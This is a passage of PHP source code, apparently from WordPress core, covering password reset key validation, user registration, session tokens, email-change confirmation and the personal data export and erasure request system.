$wpdb WordPress database object for queries. * @global PasswordHash $wp_hasher Portable PHP password hashing framework instance. * * @param string $key Hash to validate sending user's password. * @param string $login The user login. * @return WP_User|WP_Error WP_User object on success, WP_Error object for invalid or expired keys. */ function check_password_reset_key( $key, $login ) { global $wpdb, $wp_hasher; $key = preg_replace( '/[^a-z0-9]/i', '', $key ); if ( empty( $key ) || ! is_string( $key ) ) { return new WP_Error( 'invalid_key', __( 'Invalid key.' ) ); } if ( empty( $login ) || ! is_string( $login ) ) { return new WP_Error( 'invalid_key', __( 'Invalid key.' ) ); } $row = $wpdb->get_row( $wpdb->prepare( "SELECT ID, user_activation_key FROM $wpdb->users WHERE user_login = %s", $login ) ); if ( ! $row ) { return new WP_Error( 'invalid_key', __( 'Invalid key.' ) ); } if ( empty( $wp_hasher ) ) { require_once ABSPATH . WPINC . '/class-phpass.php'; $wp_hasher = new PasswordHash( 8, true ); } /** * Filters the expiration time of password reset keys. * * @since 4.3.0 * * @param int $expiration The expiration time in seconds. */ $expiration_duration = apply_filters( 'password_reset_expiration', DAY_IN_SECONDS ); if ( false !== strpos( $row->user_activation_key, ':' ) ) { list( $pass_request_time, $pass_key ) = explode( ':', $row->user_activation_key, 2 ); $expiration_time = $pass_request_time + $expiration_duration; } else { $pass_key = $row->user_activation_key; $expiration_time = false; } if ( ! $pass_key ) { return new WP_Error( 'invalid_key', __( 'Invalid key.' ) ); } $hash_is_correct = $wp_hasher->CheckPassword( $key, $pass_key ); if ( $hash_is_correct && $expiration_time && time() < $expiration_time ) { return get_userdata( $row->ID ); } elseif ( $hash_is_correct && $expiration_time ) { // Key has an expiration time that's passed return new WP_Error( 'expired_key', __( 'Invalid key.' ) ); } if ( hash_equals( $row->user_activation_key, $key ) || ( $hash_is_correct && ! $expiration_time ) ) { $return = new WP_Error( 'expired_key', __( 'Invalid key.' ) ); $user_id = $row->ID; /** * Filters the return value of check_password_reset_key() when an * old-style key is used. * * @since 3.7.0 Previously plain-text keys were stored in the database. * @since 4.3.0 Previously key hashes were stored without an expiration time. * * @param WP_Error $return A WP_Error object denoting an expired key. * Return a WP_User object to validate the key. * @param int $user_id The matched user ID. */ return apply_filters( 'password_reset_key_expired', $return, $user_id ); } return new WP_Error( 'invalid_key', __( 'Invalid key.' ) ); } /** * Handles resetting the user's password. * * @since 2.5.0 * * @param WP_User $user The user * @param string $new_pass New password for the user in plaintext */ function reset_password( $user, $new_pass ) { /** * Fires before the user's password is reset. * * @since 1.5.0 * * @param object $user The user. * @param string $new_pass New user password. */ do_action( 'password_reset', $user, $new_pass ); wp_set_password( $new_pass, $user->ID ); update_user_option( $user->ID, 'default_password_nag', false, true ); /** * Fires after the user's password is reset. * * @since 4.4.0 * * @param WP_User $user The user. * @param string $new_pass New user password. */ do_action( 'after_password_reset', $user, $new_pass ); } /** * Handles registering a new user. * * @since 2.5.0 * * @param string $user_login User's username for logging in * @param string $user_email User's email address to send password and add * @return int|WP_Error Either user's ID or error on failure. */ function register_new_user( $user_login, $user_email ) { $errors = new WP_Error(); $sanitized_user_login = sanitize_user( $user_login ); /** * Filters the email address of a user being registered. * * @since 2.1.0 * * @param string $user_email The email address of the new user. */ $user_email = apply_filters( 'user_registration_email', $user_email ); // Check the username if ( $sanitized_user_login == '' ) { $errors->add( 'empty_username', __( 'ERROR: Please enter a username.' ) ); } elseif ( ! validate_username( $user_login ) ) { $errors->add( 'invalid_username', __( 'ERROR: This username is invalid because it uses illegal characters. Please enter a valid username.' ) ); $sanitized_user_login = ''; } elseif ( username_exists( $sanitized_user_login ) ) { $errors->add( 'username_exists', __( 'ERROR: This username is already registered. Please choose another one.' ) ); } else { /** This filter is documented in wp-includes/user.php */ $illegal_user_logins = array_map( 'strtolower', (array) apply_filters( 'illegal_user_logins', array() ) ); if ( in_array( strtolower( $sanitized_user_login ), $illegal_user_logins ) ) { $errors->add( 'invalid_username', __( 'ERROR: Sorry, that username is not allowed.' ) ); } } // Check the email address if ( $user_email == '' ) { $errors->add( 'empty_email', __( 'ERROR: Please type your email address.' ) ); } elseif ( ! is_email( $user_email ) ) { $errors->add( 'invalid_email', __( 'ERROR: The email address isn’t correct.' ) ); $user_email = ''; } elseif ( email_exists( $user_email ) ) { $errors->add( 'email_exists', __( 'ERROR: This email is already registered, please choose another one.' ) ); } /** * Fires when submitting registration form data, before the user is created. * * @since 2.1.0 * * @param string $sanitized_user_login The submitted username after being sanitized. * @param string $user_email The submitted email. * @param WP_Error $errors Contains any errors with submitted username and email, * e.g., an empty field, an invalid username or email, * or an existing username or email. */ do_action( 'register_post', $sanitized_user_login, $user_email, $errors ); /** * Filters the errors encountered when a new user is being registered. * * The filtered WP_Error object may, for example, contain errors for an invalid * or existing username or email address. A WP_Error object should always returned, * but may or may not contain errors. * * If any errors are present in $errors, this will abort the user's registration. * * @since 2.1.0 * * @param WP_Error $errors A WP_Error object containing any errors encountered * during registration. * @param string $sanitized_user_login User's username after it has been sanitized. * @param string $user_email User's email. */ $errors = apply_filters( 'registration_errors', $errors, $sanitized_user_login, $user_email ); if ( $errors->has_errors() ) { return $errors; } $user_pass = wp_generate_password( 12, false ); $user_id = wp_create_user( $sanitized_user_login, $user_pass, $user_email ); if ( ! $user_id || is_wp_error( $user_id ) ) { $errors->add( 'registerfail', sprintf( __( 'ERROR: Couldn’t register you… please contact the webmaster !' ), get_option( 'admin_email' ) ) ); return $errors; } update_user_option( $user_id, 'default_password_nag', true, true ); //Set up the Password change nag. /** * Fires after a new user registration has been recorded. * * @since 4.4.0 * * @param int $user_id ID of the newly registered user. */ do_action( 'register_new_user', $user_id ); return $user_id; } /** * Initiates email notifications related to the creation of new users. * * Notifications are sent both to the site admin and to the newly created user. * * @since 4.4.0 * @since 4.6.0 Converted the `$notify` parameter to accept 'user' for sending * notifications only to the user created. * * @param int $user_id ID of the newly created user. * @param string $notify Optional. Type of notification that should happen. Accepts 'admin' * or an empty string (admin only), 'user', or 'both' (admin and user). * Default 'both'. */ function wp_send_new_user_notifications( $user_id, $notify = 'both' ) { wp_new_user_notification( $user_id, null, $notify ); } /** * Retrieve the current session token from the logged_in cookie. * * @since 4.0.0 * * @return string Token. */ function wp_get_session_token() { $cookie = wp_parse_auth_cookie( '', 'logged_in' ); return ! empty( $cookie['token'] ) ? $cookie['token'] : ''; } /** * Retrieve a list of sessions for the current user. * * @since 4.0.0 * @return array Array of sessions. */ function wp_get_all_sessions() { $manager = WP_Session_Tokens::get_instance( get_current_user_id() ); return $manager->get_all(); } /** * Remove the current session token from the database. * * @since 4.0.0 */ function wp_destroy_current_session() { $token = wp_get_session_token(); if ( $token ) { $manager = WP_Session_Tokens::get_instance( get_current_user_id() ); $manager->destroy( $token ); } } /** * Remove all but the current session token for the current user for the database. * * @since 4.0.0 */ function wp_destroy_other_sessions() { $token = wp_get_session_token(); if ( $token ) { $manager = WP_Session_Tokens::get_instance( get_current_user_id() ); $manager->destroy_others( $token ); } } /** * Remove all session tokens for the current user from the database. * * @since 4.0.0 */ function wp_destroy_all_sessions() { $manager = WP_Session_Tokens::get_instance( get_current_user_id() ); $manager->destroy_all(); } /** * Get the user IDs of all users with no role on this site. * * @since 4.4.0 * @since 4.9.0 The `$site_id` parameter was added to support multisite. * * @param int|null $site_id Optional. The site ID to get users with no role for. Defaults to the current site. * @return array Array of user IDs. */ function wp_get_users_with_no_role( $site_id = null ) { global $wpdb; if ( ! $site_id ) { $site_id = get_current_blog_id(); } $prefix = $wpdb->get_blog_prefix( $site_id ); if ( is_multisite() && $site_id != get_current_blog_id() ) { switch_to_blog( $site_id ); $role_names = wp_roles()->get_names(); restore_current_blog(); } else { $role_names = wp_roles()->get_names(); } $regex = implode( '|', array_keys( $role_names ) ); $regex = preg_replace( '/[^a-zA-Z_\|-]/', '', $regex ); $users = $wpdb->get_col( $wpdb->prepare( " SELECT user_id FROM $wpdb->usermeta WHERE meta_key = '{$prefix}capabilities' AND meta_value NOT REGEXP %s ", $regex ) ); return $users; } /** * Retrieves the current user object. * * Will set the current user, if the current user is not set. The current user * will be set to the logged-in person. If no user is logged-in, then it will * set the current user to 0, which is invalid and won't have any permissions. * * This function is used by the pluggable functions wp_get_current_user() and * get_currentuserinfo(), the latter of which is deprecated but used for backward * compatibility. * * @since 4.5.0 * @access private * * @see wp_get_current_user() * @global WP_User $current_user Checks if the current user is set. * * @return WP_User Current WP_User instance. */ function _wp_get_current_user() { global $current_user; if ( ! empty( $current_user ) ) { if ( $current_user instanceof WP_User ) { return $current_user; } // Upgrade stdClass to WP_User if ( is_object( $current_user ) && isset( $current_user->ID ) ) { $cur_id = $current_user->ID; $current_user = null; wp_set_current_user( $cur_id ); return $current_user; } // $current_user has a junk value. Force to WP_User with ID 0. $current_user = null; wp_set_current_user( 0 ); return $current_user; } if ( defined( 'XMLRPC_REQUEST' ) && XMLRPC_REQUEST ) { wp_set_current_user( 0 ); return $current_user; } /** * Filters the current user. * * The default filters use this to determine the current user from the * request's cookies, if available. * * Returning a value of false will effectively short-circuit setting * the current user. * * @since 3.9.0 * * @param int|bool $user_id User ID if one has been determined, false otherwise. */ $user_id = apply_filters( 'determine_current_user', false ); if ( ! $user_id ) { wp_set_current_user( 0 ); return $current_user; } wp_set_current_user( $user_id ); return $current_user; } /** * Send a confirmation request email when a change of user email address is attempted. * * @since 3.0.0 * @since 4.9.0 This function was moved from wp-admin/includes/ms.php so it's no longer Multisite specific. * * @global WP_Error $errors WP_Error object. */ function send_confirmation_on_profile_email() { global $errors; $current_user = wp_get_current_user(); if ( ! is_object( $errors ) ) { $errors = new WP_Error(); } if ( $current_user->ID != $_POST['user_id'] ) { return false; } if ( $current_user->user_email != $_POST['email'] ) { if ( ! is_email( $_POST['email'] ) ) { $errors->add( 'user_email', __( 'ERROR: The email address isn’t correct.' ), array( 'form-field' => 'email', ) ); return; } if ( email_exists( $_POST['email'] ) ) { $errors->add( 'user_email', __( 'ERROR: The email address is already used.' ), array( 'form-field' => 'email', ) ); delete_user_meta( $current_user->ID, '_new_email' ); return; } $hash = md5( $_POST['email'] . time() . wp_rand() ); $new_user_email = array( 'hash' => $hash, 'newemail' => $_POST['email'], ); update_user_meta( $current_user->ID, '_new_email', $new_user_email ); $sitename = wp_specialchars_decode( get_option( 'blogname' ), ENT_QUOTES ); /* translators: Do not translate USERNAME, ADMIN_URL, EMAIL, SITENAME, SITEURL: those are placeholders. */ $email_text = __( 'Howdy ###USERNAME###, You recently requested to have the email address on your account changed. If this is correct, please click on the following link to change it: ###ADMIN_URL### You can safely ignore and delete this email if you do not want to take this action. This email has been sent to ###EMAIL### Regards, All at ###SITENAME### ###SITEURL###' ); /** * Filters the text of the email sent when a change of user email address is attempted. * * The following strings have a special meaning and will get replaced dynamically: * ###USERNAME### The current user's username. * ###ADMIN_URL### The link to click on to confirm the email change. * ###EMAIL### The new email. * ###SITENAME### The name of the site. * ###SITEURL### The URL to the site. * * @since MU (3.0.0) * @since 4.9.0 This filter is no longer Multisite specific. * * @param string $email_text Text in the email. * @param array $new_user_email { * Data relating to the new user email address. * * @type string $hash The secure hash used in the confirmation link URL. * @type string $newemail The proposed new email address. * } */ $content = apply_filters( 'new_user_email_content', $email_text, $new_user_email ); $content = str_replace( '###USERNAME###', $current_user->user_login, $content ); $content = str_replace( '###ADMIN_URL###', esc_url( admin_url( 'profile.php?newuseremail=' . $hash ) ), $content ); $content = str_replace( '###EMAIL###', $_POST['email'], $content ); $content = str_replace( '###SITENAME###', $sitename, $content ); $content = str_replace( '###SITEURL###', home_url(), $content ); /* translators: New email address notification email subject. %s: Site name */ wp_mail( $_POST['email'], sprintf( __( '[%s] Email Change Request' ), $sitename ), $content ); $_POST['email'] = $current_user->user_email; } } /** * Adds an admin notice alerting the user to check for confirmation request email * after email address change. * * @since 3.0.0 * @since 4.9.0 This function was moved from wp-admin/includes/ms.php so it's no longer Multisite specific. * * @global string $pagenow */ function new_user_email_admin_notice() { global $pagenow; if ( 'profile.php' === $pagenow && isset( $_GET['updated'] ) ) { $email = get_user_meta( get_current_user_id(), '_new_email', true ); if ( $email ) { /* translators: %s: New email address */ echo '

' . sprintf( __( 'Your email address has not been updated yet. Please check your inbox at %s for a confirmation email.' ), '' . esc_html( $email['newemail'] ) . '' ) . '

'; } } } /** * Get all user privacy request types. * * @since 4.9.6 * @access private * * @return array List of core privacy action types. */ function _wp_privacy_action_request_types() { return array( 'export_personal_data', 'remove_personal_data', ); } /** * Registers the personal data exporter for users. * * @since 4.9.6 * * @param array $exporters An array of personal data exporters. * @return array An array of personal data exporters. */ function wp_register_user_personal_data_exporter( $exporters ) { $exporters['wordpress-user'] = array( 'exporter_friendly_name' => __( 'WordPress User' ), 'callback' => 'wp_user_personal_data_exporter', ); return $exporters; } /** * Finds and exports personal data associated with an email address from the user and user_meta table. * * @since 4.9.6 * * @param string $email_address The users email address. * @return array An array of personal data. */ function wp_user_personal_data_exporter( $email_address ) { $email_address = trim( $email_address ); $data_to_export = array(); $user = get_user_by( 'email', $email_address ); if ( ! $user ) { return array( 'data' => array(), 'done' => true, ); } $user_meta = get_user_meta( $user->ID ); $user_prop_to_export = array( 'ID' => __( 'User ID' ), 'user_login' => __( 'User Login Name' ), 'user_nicename' => __( 'User Nice Name' ), 'user_email' => __( 'User Email' ), 'user_url' => __( 'User URL' ), 'user_registered' => __( 'User Registration Date' ), 'display_name' => __( 'User Display Name' ), 'nickname' => __( 'User Nickname' ), 'first_name' => __( 'User First Name' ), 'last_name' => __( 'User Last Name' ), 'description' => __( 'User Description' ), ); $user_data_to_export = array(); foreach ( $user_prop_to_export as $key => $name ) { $value = ''; switch ( $key ) { case 'ID': case 'user_login': case 'user_nicename': case 'user_email': case 'user_url': case 'user_registered': case 'display_name': $value = $user->data->$key; break; case 'nickname': case 'first_name': case 'last_name': case 'description': $value = $user_meta[ $key ][0]; break; } if ( ! empty( $value ) ) { $user_data_to_export[] = array( 'name' => $name, 'value' => $value, ); } } $data_to_export[] = array( 'group_id' => 'user', 'group_label' => __( 'User' ), 'item_id' => "user-{$user->ID}", 'data' => $user_data_to_export, ); return array( 'data' => $data_to_export, 'done' => true, ); } /** * Update log when privacy request is confirmed. * * @since 4.9.6 * @access private * * @param int $request_id ID of the request. */ function _wp_privacy_account_request_confirmed( $request_id ) { $request = wp_get_user_request_data( $request_id ); if ( ! $request ) { return; } if ( ! in_array( $request->status, array( 'request-pending', 'request-failed' ), true ) ) { return; } update_post_meta( $request_id, '_wp_user_request_confirmed_timestamp', time() ); wp_update_post( array( 'ID' => $request_id, 'post_status' => 'request-confirmed', ) ); } /** * Notify the site administrator via email when a request is confirmed. * * Without this, the admin would have to manually check the site to see if any * action was needed on their part yet. * * @since 4.9.6 * * @param int $request_id The ID of the request. */ function _wp_privacy_send_request_confirmation_notification( $request_id ) { $request = wp_get_user_request_data( $request_id ); if ( ! is_a( $request, 'WP_User_Request' ) || 'request-confirmed' !== $request->status ) { return; } $already_notified = (bool) get_post_meta( $request_id, '_wp_admin_notified', true ); if ( $already_notified ) { return; } $manage_url = add_query_arg( 'page', $request->action_name, admin_url( 'tools.php' ) ); $action_description = wp_user_request_action_description( $request->action_name ); /** * Filters the recipient of the data request confirmation notification. * * In a Multisite environment, this will default to the email address of the * network admin because, by default, single site admins do not have the * capabilities required to process requests. Some networks may wish to * delegate those capabilities to a single-site admin, or a dedicated person * responsible for managing privacy requests. * * @since 4.9.6 * * @param string $admin_email The email address of the notification recipient. * @param WP_User_Request $request The request that is initiating the notification. */ $admin_email = apply_filters( 'user_request_confirmed_email_to', get_site_option( 'admin_email' ), $request ); $email_data = array( 'request' => $request, 'user_email' => $request->email, 'description' => $action_description, 'manage_url' => $manage_url, 'sitename' => wp_specialchars_decode( get_option( 'blogname' ), ENT_QUOTES ), 'siteurl' => home_url(), 'admin_email' => $admin_email, ); /* translators: Do not translate SITENAME, USER_EMAIL, DESCRIPTION, MANAGE_URL, SITEURL; those are placeholders. */ $email_text = __( 'Howdy, A user data privacy request has been confirmed on ###SITENAME###: User: ###USER_EMAIL### Request: ###DESCRIPTION### You can view and manage these data privacy requests here: ###MANAGE_URL### Regards, All at ###SITENAME### ###SITEURL###' ); /** * Filters the body of the user request confirmation email. * * The email is sent to an administrator when an user request is confirmed. * The following strings have a special meaning and will get replaced dynamically: * * ###SITENAME### The name of the site. * ###USER_EMAIL### The user email for the request. * ###DESCRIPTION### Description of the action being performed so the user knows what the email is for. * ###MANAGE_URL### The URL to manage requests. * ###SITEURL### The URL to the site. * * @since 4.9.6 * * @param string $email_text Text in the email. * @param array $email_data { * Data relating to the account action email. * * @type WP_User_Request $request User request object. * @type string $user_email The email address confirming a request * @type string $description Description of the action being performed so the user knows what the email is for. * @type string $manage_url The link to click manage privacy requests of this type. * @type string $sitename The site name sending the mail. * @type string $siteurl The site URL sending the mail. * @type string $admin_email The administrator email receiving the mail. * } */ $content = apply_filters( 'user_confirmed_action_email_content', $email_text, $email_data ); $content = str_replace( '###SITENAME###', $email_data['sitename'], $content ); $content = str_replace( '###USER_EMAIL###', $email_data['user_email'], $content ); $content = str_replace( '###DESCRIPTION###', $email_data['description'], $content ); $content = str_replace( '###MANAGE_URL###', esc_url_raw( $email_data['manage_url'] ), $content ); $content = str_replace( '###SITEURL###', esc_url_raw( $email_data['siteurl'] ), $content ); $subject = sprintf( /* translators: Privacy data request confirmed notification email subject. 1: Site title, 2: Name of the confirmed action. */ __( '[%1$s] Action Confirmed: %2$s' ), $email_data['sitename'], $action_description ); /** * Filters the subject of the user request confirmation email. * * @since 4.9.8 * * @param string $subject The email subject. * @param string $sitename The name of the site. * @param array $email_data { * Data relating to the account action email. * * @type WP_User_Request $request User request object. * @type string $user_email The email address confirming a request * @type string $description Description of the action being performed so the user knows what the email is for. * @type string $manage_url The link to click manage privacy requests of this type. * @type string $sitename The site name sending the mail. * @type string $siteurl The site URL sending the mail. * @type string $admin_email The administrator email receiving the mail. * } */ $subject = apply_filters( 'user_request_confirmed_email_subject', $subject, $email_data['sitename'], $email_data ); $email_sent = wp_mail( $email_data['admin_email'], $subject, $content ); if ( $email_sent ) { update_post_meta( $request_id, '_wp_admin_notified', true ); } } /** * Notify the user when their erasure request is fulfilled. * * Without this, the user would never know if their data was actually erased. * * @since 4.9.6 * * @param int $request_id The privacy request post ID associated with this request. */ function _wp_privacy_send_erasure_fulfillment_notification( $request_id ) { $request = wp_get_user_request_data( $request_id ); if ( ! is_a( $request, 'WP_User_Request' ) || 'request-completed' !== $request->status ) { return; } $already_notified = (bool) get_post_meta( $request_id, '_wp_user_notified', true ); if ( $already_notified ) { return; } // Localize message content for user; fallback to site default for visitors. if ( ! empty( $request->user_id ) ) { $locale = get_user_locale( $request->user_id ); } else { $locale = get_locale(); } $switched_locale = switch_to_locale( $locale ); /** * Filters the recipient of the data erasure fulfillment notification. * * @since 4.9.6 * * @param string $user_email The email address of the notification recipient. * @param WP_User_Request $request The request that is initiating the notification. */ $user_email = apply_filters( 'user_erasure_fulfillment_email_to', $request->email, $request ); $email_data = array( 'request' => $request, 'message_recipient' => $user_email, 'privacy_policy_url' => get_privacy_policy_url(), 'sitename' => wp_specialchars_decode( get_option( 'blogname' ), ENT_QUOTES ), 'siteurl' => home_url(), ); $subject = sprintf( /* translators: Erasure request fulfilled notification email subject. %s: Site name. */ __( '[%s] Erasure Request Fulfilled' ), $email_data['sitename'] ); /** * Filters the subject of the email sent when an erasure request is completed. * * @since 4.9.8 * * @param string $subject The email subject. * @param string $sitename The name of the site. * @param array $email_data { * Data relating to the account action email. * * @type WP_User_Request $request User request object. * @type string $message_recipient The address that the email will be sent to. Defaults * to the value of `$request->email`, but can be changed * by the `user_erasure_fulfillment_email_to` filter. * @type string $privacy_policy_url Privacy policy URL. * @type string $sitename The site name sending the mail. * @type string $siteurl The site URL sending the mail. * } */ $subject = apply_filters( 'user_erasure_complete_email_subject', $subject, $email_data['sitename'], $email_data ); if ( empty( $email_data['privacy_policy_url'] ) ) { /* translators: Do not translate SITENAME, SITEURL; those are placeholders. */ $email_text = __( 'Howdy, Your request to erase your personal data on ###SITENAME### has been completed. If you have any follow-up questions or concerns, please contact the site administrator. Regards, All at ###SITENAME### ###SITEURL###' ); } else { /* translators: Do not translate SITENAME, SITEURL, PRIVACY_POLICY_URL; those are placeholders. */ $email_text = __( 'Howdy, Your request to erase your personal data on ###SITENAME### has been completed. If you have any follow-up questions or concerns, please contact the site administrator. For more information, you can also read our privacy policy: ###PRIVACY_POLICY_URL### Regards, All at ###SITENAME### ###SITEURL###' ); } /** * Filters the body of the data erasure fulfillment notification. * * The email is sent to a user when a their data erasure request is fulfilled * by an administrator. * * The following strings have a special meaning and will get replaced dynamically: * * ###SITENAME### The name of the site. * ###PRIVACY_POLICY_URL### Privacy policy page URL. * ###SITEURL### The URL to the site. * * @since 4.9.6 * * @param string $email_text Text in the email. * @param array $email_data { * Data relating to the account action email. * * @type WP_User_Request $request User request object. * @type string $message_recipient The address that the email will be sent to. Defaults * to the value of `$request->email`, but can be changed * by the `user_erasure_fulfillment_email_to` filter. * @type string $privacy_policy_url Privacy policy URL. * @type string $sitename The site name sending the mail. * @type string $siteurl The site URL sending the mail. * } */ $content = apply_filters( 'user_confirmed_action_email_content', $email_text, $email_data ); $content = str_replace( '###SITENAME###', $email_data['sitename'], $content ); $content = str_replace( '###PRIVACY_POLICY_URL###', $email_data['privacy_policy_url'], $content ); $content = str_replace( '###SITEURL###', esc_url_raw( $email_data['siteurl'] ), $content ); $email_sent = wp_mail( $user_email, $subject, $content ); if ( $switched_locale ) { restore_previous_locale(); } if ( $email_sent ) { update_post_meta( $request_id, '_wp_user_notified', true ); } } /** * Return request confirmation message HTML. * * @since 4.9.6 * @access private * * @param int $request_id The request ID being confirmed. * @return string $message The confirmation message. */ function _wp_privacy_account_request_confirmed_message( $request_id ) { $request = wp_get_user_request_data( $request_id ); $message = '

' . __( 'Action has been confirmed.' ) . '

'; $message .= '

' . __( 'The site administrator has been notified and will fulfill your request as soon as possible.' ) . '

'; if ( $request && in_array( $request->action_name, _wp_privacy_action_request_types(), true ) ) { if ( 'export_personal_data' === $request->action_name ) { $message = '

' . __( 'Thanks for confirming your export request.' ) . '

'; $message .= '

' . __( 'The site administrator has been notified. You will receive a link to download your export via email when they fulfill your request.' ) . '

'; } elseif ( 'remove_personal_data' === $request->action_name ) { $message = '

' . __( 'Thanks for confirming your erasure request.' ) . '

'; $message .= '

' . __( 'The site administrator has been notified. You will receive an email confirmation when they erase your data.' ) . '

'; } } /** * Filters the message displayed to a user when they confirm a data request. * * @since 4.9.6 * * @param string $message The message to the user. * @param int $request_id The ID of the request being confirmed. */ $message = apply_filters( 'user_request_action_confirmed_message', $message, $request_id ); return $message; } /** * Create and log a user request to perform a specific action. * * Requests are stored inside a post type named `user_request` since they can apply to both * users on the site, or guests without a user account. * * @since 4.9.6 * * @param string $email_address User email address. This can be the address of a registered or non-registered user. * @param string $action_name Name of the action that is being confirmed. Required. * @param array $request_data Misc data you want to send with the verification request and pass to the actions once the request is confirmed. * @return int|WP_Error Returns the request ID if successful, or a WP_Error object on failure. */ function wp_create_user_request( $email_address = '', $action_name = '', $request_data = array() ) { $email_address = sanitize_email( $email_address ); $action_name = sanitize_key( $action_name ); if ( ! is_email( $email_address ) ) { return new WP_Error( 'invalid_email', __( 'Invalid email address.' ) ); } if ( ! $action_name ) { return new WP_Error( 'invalid_action', __( 'Invalid action name.' ) ); } $user = get_user_by( 'email', $email_address ); $user_id = $user && ! is_wp_error( $user ) ? $user->ID : 0; // Check for duplicates. $requests_query = new WP_Query( array( 'post_type' => 'user_request', 'post_name__in' => array( $action_name ), // Action name stored in post_name column. 'title' => $email_address, // Email address stored in post_title column. 'post_status' => array( 'request-pending', 'request-confirmed', ), 'fields' => 'ids', ) ); if ( $requests_query->found_posts ) { return new WP_Error( 'duplicate_request', __( 'An incomplete request for this email address already exists.' ) ); } $request_id = wp_insert_post( array( 'post_author' => $user_id, 'post_name' => $action_name, 'post_title' => $email_address, 'post_content' => wp_json_encode( $request_data ), 'post_status' => 'request-pending', 'post_type' => 'user_request', 'post_date' => current_time( 'mysql', false ), 'post_date_gmt' => current_time( 'mysql', true ), ), true ); return $request_id; } /** * Get action description from the name and return a string. * * @since 4.9.6 * * @param string $action_name Action name of the request. * @return string Human readable action name. */ function wp_user_request_action_description( $action_name ) { switch ( $action_name ) { case 'export_personal_data': $description = __( 'Export Personal Data' ); break; case 'remove_personal_data': $description = __( 'Erase Personal Data' ); break; default: /* translators: %s: action name */ $description = sprintf( __( 'Confirm the "%s" action' ), $action_name ); break; } /** * Filters the user action description. * * @since 4.9.6 * * @param string $description The default description. * @param string $action_name The name of the request. */ return apply_filters( 'user_request_action_description', $description, $action_name ); } /** * Send a confirmation request email to confirm an action. * * If the request is not already pending, it will be updated. * * @since 4.9.6 * * @param string $request_id ID of the request created via wp_create_user_request(). * @return bool|WP_Error True on success, `WP_Error` on failure. */ function wp_send_user_request( $request_id ) { $request_id = absint( $request_id ); $request = wp_get_user_request_data( $request_id ); if ( ! $request ) { return new WP_Error( 'invalid_request', __( 'Invalid user request.' ) ); } // Localize message content for user; fallback to site default for visitors. if ( ! empty( $request->user_id ) ) { $locale = get_user_locale( $request->user_id ); } else { $locale = get_locale(); } $switched_locale = switch_to_locale( $locale ); $email_data = array( 'request' => $request, 'email' => $request->email, 'description' => wp_user_request_action_description( $request->action_name ), 'confirm_url' => add_query_arg( array( 'action' => 'confirmaction', 'request_id' => $request_id, 'confirm_key' => wp_generate_user_request_key( $request_id ), ), wp_login_url() ), 'sitename' => wp_specialchars_decode( get_option( 'blogname' ), ENT_QUOTES ), 'siteurl' => home_url(), ); /* translators: Do not translate DESCRIPTION, CONFIRM_URL, SITENAME, SITEURL: those are placeholders. */ $email_text = __( 'Howdy, A request has been made to perform the following action on your account: ###DESCRIPTION### To confirm this, please click on the following link: ###CONFIRM_URL### You can safely ignore and delete this email if you do not want to take this action. Regards, All at ###SITENAME### ###SITEURL###' ); /** * Filters the text of the email sent when an account action is attempted. * * The following strings have a special meaning and will get replaced dynamically: * * ###DESCRIPTION### Description of the action being performed so the user knows what the email is for. * ###CONFIRM_URL### The link to click on to confirm the account action. * ###SITENAME### The name of the site. * ###SITEURL### The URL to the site. * * @since 4.9.6 * * @param string $email_text Text in the email. * @param array $email_data { * Data relating to the account action email. * * @type WP_User_Request $request User request object. * @type string $email The email address this is being sent to. * @type string $description Description of the action being performed so the user knows what the email is for. * @type string $confirm_url The link to click on to confirm the account action. * @type string $sitename The site name sending the mail. * @type string $siteurl The site URL sending the mail. * } */ $content = apply_filters( 'user_request_action_email_content', $email_text, $email_data ); $content = str_replace( '###DESCRIPTION###', $email_data['description'], $content ); $content = str_replace( '###CONFIRM_URL###', esc_url_raw( $email_data['confirm_url'] ), $content ); $content = str_replace( '###EMAIL###', $email_data['email'], $content ); $content = str_replace( '###SITENAME###', $email_data['sitename'], $content ); $content = str_replace( '###SITEURL###', esc_url_raw( $email_data['siteurl'] ), $content ); /* translators: Confirm privacy data request notification email subject. 1: Site title, 2: Name of the action */ $subject = sprintf( __( '[%1$s] Confirm Action: %2$s' ), $email_data['sitename'], $email_data['description'] ); /** * Filters the subject of the email sent when an account action is attempted. * * @since 4.9.6 * * @param string $subject The email subject. * @param string $sitename The name of the site. * @param array $email_data { * Data relating to the account action email. * * @type WP_User_Request $request User request object. * @type string $email The email address this is being sent to. * @type string $description Description of the action being performed so the user knows what the email is for. * @type string $confirm_url The link to click on to confirm the account action. * @type string $sitename The site name sending the mail. * @type string $siteurl The site URL sending the mail. * } */ $subject = apply_filters( 'user_request_action_email_subject', $subject, $email_data['sitename'], $email_data ); $email_sent = wp_mail( $email_data['email'], $subject, $content ); if ( $switched_locale ) { restore_previous_locale(); } if ( ! $email_sent ) { return new WP_Error( 'privacy_email_error', __( 'Unable to send personal data export confirmation email.' ) ); } return true; } /** * Returns a confirmation key for a user action and stores the hashed version for future comparison. * * @since 4.9.6 * * @param int $request_id Request ID. * @return string Confirmation key. */ function wp_generate_user_request_key( $request_id ) { global $wp_hasher; // Generate something random for a confirmation key. $key = wp_generate_password( 20, false ); // Return the key, hashed. if ( empty( $wp_hasher ) ) { require_once ABSPATH . WPINC . '/class-phpass.php'; $wp_hasher = new PasswordHash( 8, true ); } wp_update_post( array( 'ID' => $request_id, 'post_status' => 'request-pending', 'post_password' => $wp_hasher->HashPassword( $key ), ) ); return $key; } /** * Validate a user request by comparing the key with the request's key. * * @since 4.9.6 * * @param string $request_id ID of the request being confirmed. * @param string $key Provided key to validate. * @return bool|WP_Error WP_Error on failure, true on success. */ function wp_validate_user_request_key( $request_id, $key ) { global $wp_hasher; $request_id = absint( $request_id ); $request = wp_get_user_request_data( $request_id ); if ( ! $request ) { return new WP_Error( 'invalid_request', __( 'Invalid request.' ) ); } if ( ! in_array( $request->status, array( 'request-pending', 'request-failed' ), true ) ) { return new WP_Error( 'expired_link', __( 'This link has expired.' ) ); } if ( empty( $key ) ) { return new WP_Error( 'missing_key', __( 'Missing confirm key.' ) ); } if ( empty( $wp_hasher ) ) { require_once ABSPATH . WPINC . '/class-phpass.php'; $wp_hasher = new PasswordHash( 8, true ); } $key_request_time = $request->modified_timestamp; $saved_key = $request->confirm_key; if ( ! $saved_key ) { return new WP_Error( 'invalid_key', __( 'Invalid key.' ) ); } if ( ! $key_request_time ) { return new WP_Error( 'invalid_key', __( 'Invalid action.' ) ); } /** * Filters the expiration time of confirm keys. * * @since 4.9.6 * * @param int $expiration The expiration time in seconds. */ $expiration_duration = (int) apply_filters( 'user_request_key_expiration', DAY_IN_SECONDS ); $expiration_time = $key_request_time + $expiration_duration; if ( ! $wp_hasher->CheckPassword( $key, $saved_key ) ) { return new 